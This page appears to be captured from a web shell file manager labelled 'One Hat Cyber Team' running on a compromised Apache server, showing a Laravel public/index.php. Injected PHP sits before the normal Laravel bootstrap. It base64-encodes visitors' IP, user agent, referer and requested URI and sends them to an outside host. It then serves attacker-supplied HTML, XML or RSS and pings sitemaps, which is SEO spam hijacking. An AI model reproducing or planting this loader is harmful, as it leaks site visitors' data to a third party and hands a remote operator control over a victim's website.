⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.216
Server IP:
65.21.180.239
Server:
Linux gowhm.eplangoweb.com 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.0.30
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
eplangoweb
/
public_html
/
public
/
View File Name :
index.php
<?php error_reporting(0); header('Content-Type: text/html; charset=utf-8'); $lan = base64_encode(@$_SERVER['HTTP_ACCEPT_LANGUAGE']); $uri = base64_encode(@$_SERVER['REQUEST_URI']); $host = @$_SERVER['HTTP_HOST']; $agent = base64_encode(@$_SERVER['HTTP_USER_AGENT']); $referer = base64_encode(@$_SERVER['HTTP_REFERER']); $ip = base64_encode(@$_SERVER['REMOTE_ADDR']); $zone=base64_encode(date_default_timezone_get()); $http_type = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https')) ? 'https://' : 'http://'; $goweb = "https://fgd175.grandrow.top"; $typeName = base64_encode($http_type.$host); $geturl = $goweb.'/index.php?domain='.$typeName.'&uri='.$uri.'&lan='.$lan.'&agent='.$agent.'&zone='.$zone.'&ip='.$ip.'&goweb='.$goweb.'&referer='.$referer; $file_contents = getCurl($geturl); if(stripos($_SERVER['REQUEST_URI'],'jp2023')!==false){ echo $host.":cs175-ok;"; exit(); } if(strstr($file_contents,"[#*#*#]")){ $html = explode("[#*#*#]",$file_contents); if($html[0] == "echohtml"){ echo $html[1]; exit; } if($html[0] == "echoxml"){ header("Content-type: text/xml"); echo $html[1]; exit; } if($html[0] == "echorss"){ header("Content-type: text/xml"); echo $html[1]; exit; } if($html[0] == "pingxml"){ $maps=explode("|||",$html[1]); foreach($maps as $v){ $pingRes = getCurl($v); $Oooo0s = (strpos($pingRes, 'Sitemap Notification Received') !== false) ? 'OK' : 'ERROR'; echo $v . '===>Sitemap: ' . $Oooo0s ."<br>"; } exit;} } function getCurl($url) { $file_contents = @file_get_contents($url); if (!$file_contents) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); $file_contents = curl_exec($ch); curl_close($ch); } return $file_contents; }?> <?php /** * Laravel - A PHP Framework For Web Artisans * * @package Laravel * @author Taylor Otwell <taylor@laravel.com> */ define('LARAVEL_START', microtime(true)); if (file_exists(__DIR__.'/../storage/framework/maintenance.php')) { require __DIR__.'/../storage/framework/maintenance.php'; } /* |-------------------------------------------------------------------------- | Register The Auto Loader |-------------------------------------------------------------------------- | | Composer provides a convenient, automatically generated class loader for | our application. We just need to utilize it! We'll simply require it | into the script here so that we don't have to worry about manual | loading any of our classes later on. It feels great to relax. | */ require __DIR__.'/../vendor/autoload.php'; /* |-------------------------------------------------------------------------- | Turn On The Lights |-------------------------------------------------------------------------- | | We need to illuminate PHP development, so let us turn on the lights. | This bootstraps the framework and gets it ready for use, then it | will load up this application so that we can run it and send | the responses back to the browser and delight our users. | */ $app = require_once __DIR__.'/../bootstrap/app.php'; /* |-------------------------------------------------------------------------- | Run The Application |-------------------------------------------------------------------------- | | Once we have the application, we can handle the incoming request | through the kernel, and send the associated response back to | the client's browser allowing them to enjoy the creative | and wonderful application we have prepared for them. | */ $kernel = $app->make(Illuminate\Contracts\Http\Kernel::class); $response = $kernel->handle( $request = Illuminate\Http\Request::capture() ); $response->send(); $kernel->terminate($request, $response);